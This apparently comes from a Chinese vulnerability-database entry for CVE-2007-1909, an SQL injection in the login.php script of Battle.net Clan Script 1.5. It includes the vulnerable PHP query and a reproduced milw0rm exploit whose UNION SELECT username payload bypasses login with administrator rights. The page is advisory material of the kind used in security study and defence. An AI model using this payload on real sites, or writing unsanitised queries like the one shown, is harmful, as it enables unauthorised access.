Battle.net clan login.php脚本远程SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112663 漏洞类型 SQL注入
发布时间 2007-04-09 更新时间 2007-04-11
CVE编号 CVE-2007-1909 CNNVD-ID CNNVD-200704-172
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3691
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-172
|漏洞详情
Battle.netclan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。Battle.netclan系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。Battle.netclan的login.php脚本没有正确地验证通过index.php对user参数的输入:line9-->$user=$_POST["user"];line10-->$pass=$_POST["pass"];...............line21-->mysql_query("SELECT*FROMbcs_membersWHEREname='$user'ANDpassword='$pass'",$link);允许攻击者以管理员权限登录。但成功攻击要求禁用了magic_quotes_gpc。
|漏洞EXP
****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X

***************************************

code :
------------------------------------------------------------------------------------------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

-------------------------------------------------------------------------------------------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything





************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"

************************************************** *

# milw0rm.com [2007-04-09]
|参考资料

来源:BID
名称:23383
链接:http://www.securityfocus.com/bid/23383
来源:MILW0RM
名称:3691
链接:http://www.milw0rm.com/exploits/3691
来源:OSVDB
名称:34747
链接:http://osvdb.org/34747
来源:VUPEN
名称:ADV-2007-1313
链接:http://www.frsirt.com/english/advisories/2007/1313
来源:SECUNIA
名称:24838
链接:http://secunia.com/advisories/24838